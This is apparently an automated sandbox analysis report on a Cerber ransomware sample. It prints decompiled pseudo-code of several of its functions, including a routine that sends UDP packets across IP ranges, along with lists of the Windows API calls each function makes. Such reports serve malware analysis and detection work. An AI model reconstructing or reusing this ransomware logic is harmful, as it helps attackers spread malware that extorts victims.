                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.NTDLL ref: 004013B8
                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
                                                                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseHandleProcess$CreateObjectSingleTerminateWaitmemset
                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                        • API String ID: 1471562994-2746444292
                                                                                                                                                                                        • Opcode ID: 02a6747f236ae747b7cebf3ec0865747d83315405aff740321669886b7dc3b32
                                                                                                                                                                                        • Instruction ID: ddf5f14e466ed530b43ca890467a1ba3be817bc74457b95caa82e618a00c64c9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a6747f236ae747b7cebf3ec0865747d83315405aff740321669886b7dc3b32
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B117971841128BBCB21ABA1CD0AECF7F3CEF00751F200076F605B60E1DA795A04DAE9
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                        			E00407341(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                                        				signed int _v6;
                                                                                                                                                                                        				char _v7;
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v9;
                                                                                                                                                                                        				intOrPtr _v13;
                                                                                                                                                                                        				intOrPtr _v14;
                                                                                                                                                                                        				intOrPtr _v15;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				signed int _v20;
				CHAR* _v24;
				signed int _v28;
				char _v29;
				char _v30;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				short _v54;
				char _v56;
				char* _v60;
				char _v64;
				intOrPtr _v68;
				signed char _v84;
				char _v188;
				char _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t83;
				void* _t87;
				void* _t90;
				signed int _t93;
				char* _t98;
				long _t106;
				void* _t108;
				signed short _t111;
				short _t114;
				intOrPtr _t115;
				void* _t117;
				intOrPtr _t120;
				char _t135;
				char _t136;
				char _t141;
				void* _t146;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t150;
				signed int _t152;
				void* _t159;
				void* _t168;
				signed int _t172;
				char _t175;
				void* _t176;
				CHAR* _t178;
				short _t181;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t191;
				void* _t192;
				signed int _t199;
                                                                                                                                                                                        
				_t168 = __edx;
				_v9 = 0;
				_t83 = E00405905(0x40d534, 7, 0xfd311b35);
				_t185 = _t184 + 0xc;
				_t176 = E004031AF(_a4, __eflags, _t83);
				_t196 = _t176;
				if(_t176 != 0) {
					_t87 = E00405905( &E0040D53C, 0xa, 0xfcf57ebc);
					_t186 = _t185 + 0xc;
					_t150 = E004031AF(_t176, _t196, _t87);
					_t197 = _t150;
					if(_t150 != 0) {
						_t90 = E00405905(0x40d548, 7, 0x9c7f3440);
						_t187 = _t186 + 0xc;
						_t93 = E00403253(E004031AF(_t150, _t197, _t90), _t197);
						_v20 = _v20 & 0x00000000;
						_v40 = _t93;
						if(_t93 == 0) {
							_t6 =  &_v40;
							 *_t6 = _v40 | 0xffffffff;
							_t199 =  *_t6;
						}
						_t169 = E004031AF(_t150, _t199, _a8);
						_t98 = E00401127(0, E004032B8(_t95, _t199));
						_v60 = _t98;
						if(_t98 != 0) {
							_t178 = E004078F0(_t98,  &_v20, _t168,  &_v20);
							_pop(_t159);
							_v24 = _t178;
							_t201 = _t178;
							if(_t178 != 0) {
								CharLowerBuffA(_t178, _v20);
								E0040AD86(_t159, _t178, _v20,  &_v84);
								_t106 = E00405BAA(_t150,  &_v24, _t169, _t178, _t201);
								_v20 = _t106;
								CharLowerBuffA(_v24, _t106);
								_t108 = E00405905(0x40d558, 4, 0x60ae4eaf);
								_t191 = _t187 + 0x30;
								_t111 = E00403253(E004031AF(_t150, _t201, _t108), _t201);
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t181 = 2;
								asm("stosw");
								_v56 = _t181;
								_t114 =  *0x40e020(_t111 & 0x0000ffff, _v20, E00405905(0x40d550, 4, 0x8ba91a9e), _v84 & 0x000000ff);
								_v54 = _t114;
								_t115 =  *0x40e000(_t181, _t181, 0x11);
								_v36 = _t115;
								_t202 = _t115 - 0xffffffff;
								if(_t115 != 0xffffffff) {
									_t117 = E00405905(0x40d560, _t181, 0x7d18c472);
									_t192 = _t191 + 0xc;
									_t183 = E004031AF(_t150, _t202, _t117);
									_t120 = E00403156(_t119, _t202);
									_v28 = _v28 & 0x00000000;
									_v68 = _t120;
									_t203 = _t120;
									if(_t120 != 0) {
										do {
											_push( &_v64);
											_push( &_v292);
											_push( &_v188);
											_push(E00405905(0x40d564, 0xb, 0xb32d2f4a));
											sscanf(E004032B8(E0040317B(_t183, _t203, _v28), _t203));
											_t192 = _t192 + 0x20;
											_t172 = E0040557F(_v64);
											_t152 = E00405532( &_v188) & _t172;
											_v16 =  !_t172 | _t152;
											_t175 = 0;
											_v32 = _t152;
											_v5 = _t152;
											if(_t152 <= _v16) {
												do {
													_v6 = _t152;
													if(_t152 <= _v15) {
														do {
															_t135 = _v30;
															while(1) {
																_v8 = _t135;
																if(_t135 > _v14) {
																	break;
																}
																_t136 = _v29;
																while(1) {
																	_v7 = _t136;
																	__eflags = _t136 - _v13;
																	if(_t136 > _v13) {
																		break;
																	}
																	_v52 = _v5;
																	_v51 = _v6;
																	_v50 = _v8;
																	_v49 = _v7;
																	_t141 = _t175;
																	_t175 = _t175 + 1;
																	__eflags = _t141 - _v40;
																	if(_t141 == _v40) {
																		_t175 = 0;
																		__eflags = 0;
																		Sleep(0x3e8);
																	}
																	E00402B21(_t152, _t168, _t175, _t183);
																	_t192 = _t192 + 0x1c;
																	_t146 =  *0x40e01c(_v36, _v24, _v20, 0,  &_v56, 0x10, _a4, E00405905(0x40d570, 0x13, 0xb66841e3), E0040555D(_v52), _v24);
																	__eflags = _t146 - _v20;
																	if(_t146 == _v20) {
																		_v9 = 1;
																	}
																	_t147 = _v7;
																	__eflags = _t147 - 0xff;
																	if(_t147 != 0xff) {
																		_t136 = _t147 + 1;
                                                                                                                                                                                        																		__eflags = _t136;
                                                                                                                                                                                        																		continue;
                                                                                                                                                                                        																	}
                                                                                                                                                                                        																	break;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																_t148 = _v8;
                                                                                                                                                                                        																__eflags = _t148 - 0xff;
                                                                                                                                                                                        																if(__eflags != 0) {
                                                                                                                                                                                        																	_t135 = _t148 + 1;
                                                                                                                                                                                        																	__eflags = _t135;
                                                                                                                                                                                        																	continue;
                                                                                                                                                                                        																}
                                                                                                                                                                                        																break;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															if(_v6 != 0xff) {
                                                                                                                                                                                        																goto L23;
                                                                                                                                                                                        															}
                                                                                                                                                                                        															goto L24;
                                                                                                                                                                                        															L23:
                                                                                                                                                                                        															_v6 = _v6 + 1;
                                                                                                                                                                                        														} while (_v6 <= _v15);
                                                                                                                                                                                        													}
                                                                                                                                                                                        													L24:
                                                                                                                                                                                        													if(_v5 != 0xff) {
                                                                                                                                                                                        														goto L25;
                                                                                                                                                                                        													}
                                                                                                                                                                                        													goto L26;
                                                                                                                                                                                        													L25:
                                                                                                                                                                                        													_v5 = _v5 + 1;
                                                                                                                                                                                        												} while (_v5 <= _v16);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L26:
                                                                                                                                                                                        											_v28 = _v28 + 1;
                                                                                                                                                                                        										} while (_v28 < _v68);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									E00405568(_v36);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								E00405463(_v24);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E00405463(_v60);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v9;
                                                                                                                                                                                        			}






































































                                                                                                                                                                                        0x004075fb
                                                                                                                                                                                        0x0040760b
                                                                                                                                                                                        0x0040760e
                                                                                                                                                                                        0x00407610
                                                                                                                                                                                        0x00407612
                                                                                                                                                                                        0x00407612
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407612
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407610
                                                                                                                                                                                        0x00407624
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00407626
                                                                                                                                                                                        0x00407626
                                                                                                                                                                                        0x0040762c
                                                                                                                                                                                        0x0040756c
                                                                                                                                                                                        0x00407635
                                                                                                                                                                                        0x00407639
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040763b
                                                                                                                                                                                        0x0040763b
                                                                                                                                                                                        0x00407641
                                                                                                                                                                                        0x00407560
                                                                                                                                                                                        0x0040764a
                                                                                                                                                                                        0x0040764a
                                                                                                                                                                                        0x00407650
                                                                                                                                                                                        0x004074ec
                                                                                                                                                                                        0x0040765c
                                                                                                                                                                                        0x00407661
                                                                                                                                                                                        0x00407665
                                                                                                                                                                                        0x00407665
                                                                                                                                                                                        0x0040766d
                                                                                                                                                                                        0x0040766d
                                                                                                                                                                                        0x004073f3
                                                                                                                                                                                        0x0040739a
                                                                                                                                                                                        0x00407679

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                        • CharLowerBuffA.USER32(00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00407414
                                                                                                                                                                                        • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?), ref: 00407459
                                                                                                                                                                                        • htons.WS2_32 ref: 0040749A
                                                                                                                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 004074A8
                                                                                                                                                                                        • sscanf.MSVCRT ref: 00407524
                                                                                                                                                                                          • Part of subcall function 0040557F: htonl.WS2_32(?), ref: 0040558D
                                                                                                                                                                                          • Part of subcall function 00405532: inet_addr.WS2_32(Cu@), ref: 00405537
                                                                                                                                                                                          • Part of subcall function 00405532: gethostbyname.WS2_32(?), ref: 00405548
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BuffCharLower$gethostbynamehtonlhtonsinet_addrlstrcmpisocketsscanf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2857926056-0
                                                                                                                                                                                        • Opcode ID: fff0297137f3174a5ffad4f1bb4543e4105e68f35fac7bcfbf95552bbb5e5ba7
                                                                                                                                                                                        • Instruction ID: 78b374b52b19eb6b1b31afc7c374d959c6df6e4001e96d7b0c5d057715c2210f
                                                                                                                                                                                        • Opcode Fuzzy Hash: fff0297137f3174a5ffad4f1bb4543e4105e68f35fac7bcfbf95552bbb5e5ba7
                                                                                                                                                                                        • Instruction Fuzzy Hash: E291F971D04248BEDF01ABF99C02AEF7F75AF05314F1404BAF454B62C2D6395A068B6A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                        			E00402438(char __ebx, void* __edx, char _a4) {
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                        				char _t38;
                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				long _t50;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                        				_t38 = __ebx;
                                                                                                                                                                                        				_t39 = 7;
                                                                                                                                                                                        				_t45 =  &_v36;
                                                                                                                                                                                        				memset(_t45, 0, _t39 << 2);
                                                                                                                                                                                        				_t54 = _t53 + 0xc;
                                                                                                                                                                                        				_t46 = _t45 + _t39;
                                                                                                                                                                                        				_t3 =  &_a4; // 0x40666c
                                                                                                                                                                                        				_v40 = __ebx;
                                                                                                                                                                                        				_v12 =  *_t3;
                                                                                                                                                                                        				_t14 = E00402C54(_t44, __ebx);
                                                                                                                                                                                        				_pop(_t41);
                                                                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                                                                        					E00404CDC();
                                                                                                                                                                                        					_a4 = GetTickCount();
                                                                                                                                                                                        					_push(E0040591C(0x40d134, 0x14, 0xa9527bfc));
                                                                                                                                                                                        					_push(__ebx);
                                                                                                                                                                                        					E00402C20(__ebx, _t44, _t46, _t48);
                                                                                                                                                                                        					_t54 = _t54 + 0x14;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t49 = E0040622D(_t38, _t41);
                                                                                                                                                                                        				 *0x40f1d8( &_v36);
                                                                                                                                                                                        				_t19 = 1;
                                                                                                                                                                                        				if( *0x42f79c != 0) {
                                                                                                                                                                                        					_t19 = E00405FF0() *  *0x42f798;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t19 != 0) {
                                                                                                                                                                                        					_t47 = _t19;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						E00406309(_t49, _t41, _t52, E00401EB2,  &_v40);
                                                                                                                                                                                        						_t47 = _t47 - 1;
                                                                                                                                                                                        						_pop(_t41);
                                                                                                                                                                                        					} while (_t47 != 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E0040630E(_t49);
                                                                                                                                                                                        				E0040634B(_t49, _t38);
                                                                                                                                                                                        				_t50 = GetTickCount();
                                                                                                                                                                                        				if(E00402C54(_t44, _t38) != 0) {
                                                                                                                                                                                        					_t9 =  &_a4; // 0x40666c
                                                                                                                                                                                        					_t51 = _t50 -  *_t9;
                                                                                                                                                                                        					_push(_t50 -  *_t9);
                                                                                                                                                                                        					_push(E0040591C( &E0040D14C, 0x20, 0x4e29eca8));
                                                                                                                                                                                        					_push(_t38);
                                                                                                                                                                                        					E00402C20(_t38, _t44, _t46, _t51);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return  *0x40f1e0( &_v36);
                                                                                                                                                                                        			}

























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00402463
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 00402492
                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004024D9
                                                                                                                                                                                        • RtlDeleteCriticalSection.NTDLL(?), ref: 00402512
                                                                                                                                                                                          • Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(0042FBC8,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000), ref: 00404CE8
                                                                                                                                                                                          • Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(0042FBC8,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
                                                                                                                                                                                          • Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(0042FBC8,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CountCriticalSectionTick$AttributesCreateDeleteDirectoryFileInitializePathRootSkip
                                                                                                                                                                                        • String ID: 0jt$lf@
                                                                                                                                                                                        • API String ID: 892241556-2925110192
                                                                                                                                                                                        • Opcode ID: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
                                                                                                                                                                                        • Instruction ID: 166ea61db472a150428fbf2cef9c788feb35943bfc0e1425f8dccfb6179776be
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121F9B290021167DB10BBB59D4E98F3BA8DF48318B54043BF905F71C2DE7CD94986AC
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00404D43(WCHAR* __edi) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				short _v1044;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                        				WCHAR* _t21;
                                                                                                                                                                                        				WCHAR* _t25;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        				WCHAR* _t27;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t25 = __edi;
                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                        				if(GetTempPathW(0x104,  &_v1044) != 0) {
                                                                                                                                                                                        					_t14 = GetTempFileNameW( &_v1044, E0040591C("W+x", 3, 0x9544c64e), 0,  &_v524);
                                                                                                                                                                                        					_t32 = _t14;
                                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                                        						_t27 =  &_v524;
                                                                                                                                                                                        						E00404E5E(_t27, _t32);
                                                                                                                                                                                        						if(__edi != 0) {
                                                                                                                                                                                        							_t21 = _t28 + lstrlenW(_t27) * 2 - 0x208;
                                                                                                                                                                                        							while( *_t21 != 0x2e) {
                                                                                                                                                                                        								_t21 = _t21 - 2;
                                                                                                                                                                                        								__eflags = _t21;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if( *_t25 != 0x2e) {
                                                                                                                                                                                        								_t21 =  &(_t21[1]);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							lstrcpyW(_t21, _t25);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t26 = E00405933(0,  &_v524);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t26;
                                                                                                                                                                                        			}



                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?), ref: 00404D5B
                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00404D89
                                                                                                                                                                                          • Part of subcall function 00404E5E: SetFileAttributesW.KERNEL32(?,00000080,00000000,00404D9E), ref: 00404E67
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404DA5
                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00404DC8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileTemp$AttributesNamePathlstrcpylstrlen
                                                                                                                                                                                        • String ID: W+x${f@
                                                                                                                                                                                        • API String ID: 1221998058-3981993173
                                                                                                                                                                                        • Opcode ID: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
                                                                                                                                                                                        • Instruction ID: 3d1850192e65b297c1812ba81e242392aa226734748325530c2f33dcaa0427c0
                                                                                                                                                                                        • Opcode Fuzzy Hash: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
                                                                                                                                                                                        • Instruction Fuzzy Hash: F70196F290022997CB70AB65DD09ED777ACEF80700F04017AB605F31D1EA78DE848AD8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                        			E0040A6C5(void* __ecx, void* __eflags, char* _a4) {
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                        				char _v23;
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                                        				intOrPtr* _t50;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        				intOrPtr* _t52;
                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				char* _t72;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                        
                                                                                                                                                                                        				E00405F6B(__ecx, __eflags,  &_v28);
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosw");
                                                                                                                                                                                        				asm("stosb");
                                                                                                                                                                                        				_t72 = _a4;
                                                                                                                                                                                        				_t66 = _t70;
                                                                                                                                                                                        				_v24 =  *_t72;
                                                                                                                                                                                        				CharLowerBuffW( *(_t72 + 8), lstrlenW( *(_t72 + 8)));
                                                                                                                                                                                        				_t75 = E0040A367;
                                                                                                                                                                                        				_t62 = 0;
                                                                                                                                                                                        				E0040A419(_t66, 0,  *(_t72 + 8), E0040A367,  &_v24);
                                                                                                                                                                                        				_t83 = (_t80 & 0xfffffff8) - 0x1c + 0x10;
                                                                                                                                                                                        				if( *_t72 != 0) {
                                                                                                                                                                                        					_t55 =  *0x42fa74; // 0x0
                                                                                                                                                                                        					_v23 = 1;
                                                                                                                                                                                        					if(_t55 != 0 &&  *_t55 > 0) {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t66 =  &_v24;
                                                                                                                                                                                        							E0040A419( &_v24, 0,  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8)) + _t62 * 4)), E0040A367,  &_v24);
                                                                                                                                                                                        							_t55 =  *0x42fa74; // 0x0
                                                                                                                                                                                        							_t83 = _t83 + 0x10;
                                                                                                                                                                                        							_t62 = _t62 + 1;
                                                                                                                                                                                        						} while (_t62 <  *_t55);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t64 = 0;
                                                                                                                                                                                        					_t89 =  *0x42fad0 - _t64; // 0x0
                                                                                                                                                                                        					if(_t89 > 0) {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t57 =  *0x42facc; // 0x0
                                                                                                                                                                                        							E0040A419(_t66, 0,  *((intOrPtr*)(_t57 + _t64 * 4)), _t75,  &_v24);
                                                                                                                                                                                        							_t83 = _t83 + 0x10;
                                                                                                                                                                                        							_t64 = _t64 + 1;
                                                                                                                                                                                        							_t90 = _t64 -  *0x42fad0; // 0x0
                                                                                                                                                                                        						} while (_t90 < 0);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v16 == 0) {
                                                                                                                                                                                        					E0040A6AC(_v20);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					InterlockedIncrement( *(_t72 + 4));
                                                                                                                                                                                        					 *0x40f1dc( *((intOrPtr*)(_t72 + 0xc)));
                                                                                                                                                                                        					_t67 = _v16;
                                                                                                                                                                                        					if( *_t72 == 0) {
                                                                                                                                                                                        						_t49 =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                                                                                                        						__eflags =  *_t49;
                                                                                                                                                                                        						if( *_t49 == 0) {
                                                                                                                                                                                        							_t50 =  *((intOrPtr*)(_t72 + 0x14));
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t50 =  *_t49;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *_t50 = _t67;
                                                                                                                                                                                        						_t67 = _v12;
                                                                                                                                                                                        						_t51 =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t51 =  *((intOrPtr*)(_t72 + 0x10));
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *_t51 = _t67;
                                                                                                                                                                                        					_t52 =  *((intOrPtr*)(_t72 + 0x1c));
                                                                                                                                                                                        					if( *_t52 == 0) {
                                                                                                                                                                                        						 *_t52 = _v24;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t54 =  *_t52;
                                                                                                                                                                                        						while( *((intOrPtr*)(_t54 + 0xc)) != 0) {
                                                                                                                                                                                        							_t54 =  *((intOrPtr*)(_t54 + 0xc));
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *((intOrPtr*)(_t54 + 0xc)) = _v24;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *0x40f1e4( *((intOrPtr*)(_t72 + 0xc)));
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E00405463( *(_t72 + 8));
                                                                                                                                                                                        				return E00405463(_t72);
                                                                                                                                                                                        			}



























                                                                                                                                                                                        0x0040a7ce
                                                                                                                                                                                        0x0040a7cb
                                                                                                                                                                                        0x0040a7cb
                                                                                                                                                                                        0x0040a7d7
                                                                                                                                                                                        0x0040a7d7
                                                                                                                                                                                        0x0040a7e5
                                                                                                                                                                                        0x0040a7e5
                                                                                                                                                                                        0x0040a7f9
                                                                                                                                                                                        0x0040a80b

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,0042F840,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0040A6F5
                                                                                                                                                                                        • CharLowerBuffW.USER32(?,00000000), ref: 0040A6FF
                                                                                                                                                                                          • Part of subcall function 0040A419: wsprintfW.USER32 ref: 0040A464
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileAttributesW.KERNEL32(?), ref: 0040A479
                                                                                                                                                                                          • Part of subcall function 0040A419: GetFileSecurityW.ADVAPI32(?,00000001,?,00000400,?), ref: 0040A4A4
